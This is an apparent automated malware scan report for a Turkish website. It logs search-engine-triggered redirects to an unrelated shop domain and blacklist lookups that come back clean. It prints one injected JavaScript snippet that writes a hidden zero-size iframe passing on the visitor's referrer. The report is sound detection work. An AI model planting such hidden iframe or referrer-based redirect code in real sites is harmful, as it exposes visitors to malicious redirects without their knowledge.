Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://handetemizlik.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: handetemizlik.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Mon, 01 Sep 2014 00:40:19 GMT Location: http://rb.cvrcc.com/?handetemizlik.com Server: Microsoft-IIS/6.0 Content-Length: 159 Content-Type: text/html Set-Cookie: ASPSESSIONIDCSRCARBR=BICJJOKBBIEALLINLMMGKEOJ; path=/ X-Powered-By: ASP.NET | malicious |
URL: http://rb.cvrcc.com/?handetemizlik.com (imitation of visitor from search engine) GET /?handetemizlik.com HTTP/1.1 Host: rb.cvrcc.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 01 Sep 2014 00:40:22 GMT Location: http://www.raybangozluk-turkey.com/?handetemizlik.com Server: nginx/1.4.2 Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://handetemizlik.com/ | 200 OK Content-Length: 9811 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write("<iframe "+ "src=frame.asp?gelinen="+document.referrer+ " target=yok "+"name=yok "+"width=0 "+"height=0>"); document.write("</iframe>"); Antivirus reports:
| ||
http://handetemizlik.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=handetemizlik.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://handetemizlik.com/
Result: handetemizlik.com is not infected or malware details are not published yet.
Result: handetemizlik.com is not infected or malware details are not published yet.